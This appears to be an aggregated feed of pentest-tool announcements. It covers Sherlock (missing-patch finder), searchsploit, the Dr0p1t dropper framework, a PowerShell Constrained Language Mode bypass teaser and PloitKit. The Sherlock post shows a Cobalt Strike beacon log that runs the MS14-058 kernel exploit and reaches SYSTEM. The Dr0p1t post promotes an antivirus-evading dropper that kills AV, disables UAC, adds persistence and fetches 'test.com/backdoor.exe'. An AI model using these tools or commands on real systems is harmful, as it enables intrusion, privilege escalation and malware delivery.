Sherlock – Tool to find missing Windows patches for Local Privilege Escalation Vulnerabilities

PowerShell script to quickly find missing Microsoft patches for local privilege escalation vulnerabilities.Currently looks for:MS10-015 : User Mode to Ring (KiTrap0D)MS10-092 : Task SchedulerMS13-053 : NTUserMessageCall Win32k Kernel Pool OverflowMS13-081 : TrackPopupMenuEx Win32k NULL PageMS14-058 : TrackPopupMenu Win32k Null Pointer DereferenceMS15-051 : ClientCopyImage Win32kMS15-078 : Font Driver Buffer OverflowMS16-016 : ‘mrxdav.sys’ WebDAVMS16-032 : Secondary Logon HandleTested on:Windows 7 SP1 32-bitWindows 7 SP1 64-bitWindows 8 64-bitWindows 10 64-bitBasic Usage:beacon> getuid[*] Tasked beacon to get userid[+] host called home, sent: 20 bytes[*] You are Win7-x64\Rastabeacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1[+] host called home, sent: 2960 bytesbeacon> powershell Find-AllVulns[*] Tasked beacon to run: Find-AllVulns[+] host called home, sent: 21 bytes[+] received output:Title : User Mode to Ring (KiTrap0D)MSBulletin : MS10-015CVEID : 2010-0232Link : https://www.exploit-db.com/exploits/11199/VulnStatus : Not supported on 64-bit systemsTitle : Task Scheduler .XMLMSBulletin : MS10-092CVEID : 2010-3338, 2010-3888Link : https://www.exploit-db.com/exploits/19930/VulnStatus : Not VulnerableTitle : NTUserMessageCall Win32k Kernel Pool OverflowMSBulletin : MS13-053CVEID : 2013-1300Link : https://www.exploit-db.com/exploits/33213/VulnStatus : Not supported on 64-bit systemsTitle : TrackPopupMenuEx Win32k NULL PageMSBulletin : MS13-081CVEID : 2013-3881Link : https://www.exploit-db.com/exploits/31576/VulnStatus : Not supported on 64-bit systemsTitle : TrackPopupMenu Win32k Null Pointer DereferenceMSBulletin : MS14-058CVEID : 2014-4113Link : https://www.exploit-db.com/exploits/35101/VulnStatus : Appears VulnerableTitle : ClientCopyImage Win32kMSBulletin : MS15-051CVEID : 2015-1701, 2015-2433Link : https://www.exploit-db.com/exploits/37367/VulnStatus : Appears VulnerableTitle : Font Driver Buffer OverflowMSBulletin : MS15-078CVEID : 2015-2426, 2015-2433Link : https://www.exploit-db.com/exploits/38222/VulnStatus : Not VulnerableTitle : ‘mrxdav.sys’ WebDAVMSBulletin : MS16-016CVEID : 2016-0051Link : https://www.exploit-db.com/exploits/40085/VulnStatus : Not supported on 64-bit systemsTitle : Secondary Logon HandleMSBulletin : MS16-032CVEID : 2016-0099Link : https://www.exploit-db.com/exploits/39719/VulnStatus : Appears Vulnerablebeacon> elevate ms14-058 smb[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)[+] host called home, sent: 105015 bytes[+] received output:[*] Getting Windows version…[*] Solving symbols…[*] Requesting Kernel loaded modules…[*] pZwQuerySystemInformation required length 51216[*] Parsing SYSTEM_INFO…[*] 173 Kernel modules found[*] Checking module \SystemRoot\system32\ntoskrnl.exe[*] Good! nt found as ntoskrnl.exe at 0x0264f000[*] ntoskrnl.exe loaded in userspace at: 40000000[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0[*] Registering class…[*] Creating window…[*] Allocating null page…[*] Getting PtiCurrent…[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0[*] Creating a fake structure at NULL…[*] Triggering vulnerability…[!] Executing payload…[+] host called home, sent: 204885 bytes[+] established link to child beacon: 192.168.56.105[+] established link to parent beacon: 192.168.56.105beacon> getuid[*] Tasked beacon to get userid[+] host called home, sent: 8 bytes[*] You are NT AUTHORITY\SYSTEM (admin)Download Sherlock

Link: http://feedproxy.google.com/~r/PentestTools/~3/q7lscN0kyzI/sherlock-tool-to-find-missing-windows.html

Exploit Database – The official Exploit Database Repository

The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away.This repository is updated daily with the most recently added submissions. Any additional resources can be found in our binary sploits repository.Included with this repository is the searchsploit utility, which will allow you to search through the exploits using one or more terms. For more information, please see the SearchSploit manual.root@kali:~# searchsploit -h Usage: searchsploit [options] term1 [term2] … [termN]========== Examples========== searchsploit afd windows local searchsploit -t oracle windows searchsploit -p 39446========= Options========= -c, –case [Term] Perform a case-sensitive search (Default is inSEnsITiVe). -e, –exact [Term] Perform an EXACT match on exploit title (Default is AND) [Implies “-t"]. -h, –help Show this help screen. -j, –json [Term] Show result in JSON format. -m, –mirror [EDB-ID] Mirror (aka copies) an exploit to the current working directory. -o, –overflow [Term] Exploit titles are allowed to overflow their columns. -p, –path [EDB-ID] Show the full path to an exploit (and also copies the path to the clipboard if possible). -t, –title [Term] Search JUST the exploit title (Default is title AND the file’s path). -u, –update Check for and install any exploitdb package updates (deb or git). -w, –www [Term] Show URLs to Exploit-DB.com rather than the local path. -x, –examine [EDB-ID] Examine (aka opens) the exploit using $PAGER. –colour Disable colour highlighting in search results. –id Display the EDB-ID value rather than local path. –nmap [file.xml] Checks all results in Nmap’s XML output with service version (e.g.: nmap -sV -oX file.xml). Use "-v" (verbose) to try even more combinations======= Notes======= * You can use any number of search terms. * Search terms are not case-sensitive (by default), and ordering is irrelevant. * Use ‘-c’ if you wish to reduce results by case-sensitive searching. * And/Or ‘-e’ if you wish to filter results by using an exact match. * Use ‘-t’ to exclude the file’s path to filter the search results. * Remove false positives (especially when searching using numbers – i.e. versions). * When updating from git or displaying help, search terms will be ignored.root@kali:~#root@kali:~# searchsploit afd windows local——————————————————————————— ———————————- Exploit Title | Path | (/usr/share/exploitdb/platforms)——————————————————————————— ———————————-Microsoft Windows XP – ‘afd.sys’ Local Kernel Denial of Service | ./windows/dos/17133.cMicrosoft Windows 2003/XP – ‘afd.sys’ Privilege Escalation (K-plugin) (MS08-066) | ./windows/local/6757.txtMicrosoft Windows XP/2003 – ‘afd.sys’ Privilege Escalation (MS11-080) | ./windows/local/18176.pyMicrosoft Windows – ‘AfdJoinLeaf’ Privilege Escalation (MS11-080) (Metasploit) | ./windows/local/21844.rbMicrosoft Windows – ‘afd.sys’ Dangling Pointer Privilege Escalation (MS14-040) | ./win_x86/local/39446.pyMicrosoft Windows 7 (x64) – ‘afd.sys’ Privilege Escalation (MS14-040) | ./win_x86-64/local/39525.pyMicrosoft Windows (x86) – ‘afd.sys’ Privilege Escalation (MS11-046) | ./windows/local/40564.c——————————————————————————— ———————————-root@kali:~#root@kali:~# searchsploit -p 39446Exploit: Microsoft Windows – ‘afd.sys’ Dangling Pointer Privilege Escalation (MS14-040) URL: https://www.exploit-db.com/exploits/39446/ Path: /usr/share/exploitdb/platforms/win_x86/local/39446.pyCopied EDB-ID 39446’s path to the clipboard.root@kali:~#SearchSploit requires either "CoreUtils" or "utilities" (e.g. bash, sed, grep, awk, etc.) for the core features to work. The self updating function will require git, and the Nmap XML option to work, will require xmllint (found in the libxml2-utils package in Debian-based systems).Download Exploit Database

Link: http://feedproxy.google.com/~r/PentestTools/~3/5lR5-Tnz96A/exploit-database-official-exploit.html

Dr0p1t-Framework 1.2 – A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers ?In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks 😉 Features Framework works with Windows and Linux Download executable on target system and execute it silently.. The executable size small compared to other droppers generated the same way Self destruct function so that the dropper will kill and delete itself after finishing it work Adding executable after downloading it to startup Adding executable after downloading it to task scheduler ( UAC not matters ) Finding and killing the antivirus before running the malware Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable The ability to disable UAC In running powershell scripts it can bypass execution policy Using UPX to compress the dropper after creating it Choose an icon for the dropper after creating itScreenshotsOn WindowsOn Linux (Backbox) Help menu Usage: Dr0p1t.py Malware_Url [Options]options: -h, –help show this help message and exit -s Add your malware to startup (Persistence) -t Add your malware to task scheduler (Persistence) -k Kill antivirus process before running your malware. -b Run this batch script before running your malware. Check scripts folder -p Run this powershell script before running your malware. Check scripts folder -v Run this vbs script before running your malware. Check scripts folder –only32 Download your malware for 32 bit devices only –only64 Download your malware for 64 bit devices only –upx Use UPX to compress the final file. –nouac Disable UAC on victim device –nocompile Tell the framework to not compile the final file. -i Use icon to the final file. Check icons folder. -q Stay quite ( no banner ) -u Check for updates -nd Display less output information Examples ./Dr0p1t.py https://test.com/backdoor.exe -s -t -k –upx./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat –only32./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1./Dr0p1t.py https://test.com/backdoor.exe -s -t -k –nouac -i flash.ico Prerequisites Python 2 or Python 3. The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don’t use 3.6 because it’s not supported yet by PyInstaller Python libraries requirements in requirements.txt Needed dependencies for linux Wine Python 2.7 on Wine Machine Note : You must have root access Installation if you are on linux and do git clone https://github.com/D4Vinci/Dr0p1t-Frameworkchmod 777 -R Dr0p1t-Frameworkcd Dr0p1t-Frameworkpip install -r requirements.txt./Dr0p1t.pyAnd if you are on windows download it and then do cd Dr0p1t-Frameworkpip install -r requirements.txtpip install -r windows_requirements.txt./Dr0p1t.pyLibraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible Tested on: Kali Linux – SANA Ubuntu 14.04-16.04 LTS Windows 10/8.1/8 Changelog v1.2Pyinstaller compiling in Linux using winePyinstaller compiling in Windows will not use UPX and that will fix the compiling in windowsAdded the ability to disable and bypass UACUpdated the antivirus list in the antivirus killerAdded SelfDestruct function so that the dropper will kill and delete itself after finishing it work Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smallerStarted working in some SE tricks to fool the user and there’s a lot of good options in the way 😉 Stay Tuned Contact Twitter Facebook Download Dr0p1t-Framework

Link: http://feedproxy.google.com/~r/PentestTools/~3/0xBvTJEexbE/dr0p1t-framework-12-framework-that.html

Simple Bypass for PowerShell Constrained Language Mode

We all know that Microsoft has added some nice features to PowerShell v5 to help out the Blue teams, Constrained Language Mode, Deep Scriptblock logging, system wide transcripts and AMSI to name a few. This blog is not a lesson on each of the features mentioned above, for more information this is a great place … Continue reading Simple Bypass for PowerShell Constrained Language Mode

Link: https://pentestn00b.wordpress.com/2017/03/20/simple-bypass-for-powershell-constrained-language-mode/

PloitKit – The Hacker’s ToolBox

PloitKit is a Python based GUI tool designed as one-stop for all other softwares. I was facing these kinds of problem, when I need to switch to different system, or I lost my pen-drive. I have to go to google, and search every tool and download every tool and so on. So I decided to create a tool, in which I just click and click and tool is there. I have added more than 900+ tools in this tool, but only 400+ is available now, to test will this tool work, if it works I’ll make it available for everyone. Features Auto-Update – No need to come over here, and look for new version every time. Better Error Handling – Some tools may cause error, that’s why I added this option. Graphical Interface – For just click & click. Malware Protectiong – All tools are downloaded from their original source, so no malwares or any viruses. Multi-Platform – Many tools are for designed differently for Mac, Windows & Linux, so I added option for that. Choose your platform and you’re good to go. Better organised – Everything is better organised nothing like search everything, and all that mess. I believe that, nothing can’t be perfect, So I added option to report a tool, or send me suggestions about any new tool, I should add. Usagegit clone https://github.com/rajeshmajumdar/PloitKit.gitWindowsploitkit.pyUNIX or Macpython ploitkit.py Download PloitKit

Link: http://feedproxy.google.com/~r/PentestTools/~3/deHue-WTCYs/ploitkit-hackers-toolbox.html